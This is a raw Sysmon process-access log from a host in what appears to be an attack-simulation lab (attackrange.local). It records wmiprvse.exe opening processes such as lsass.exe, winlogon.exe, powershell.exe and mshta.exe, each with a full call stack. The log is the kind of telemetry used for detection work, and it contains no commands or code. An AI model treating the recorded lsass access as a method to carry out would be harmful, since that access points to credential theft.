16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5467-6008-C206-00000000A301}8096C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 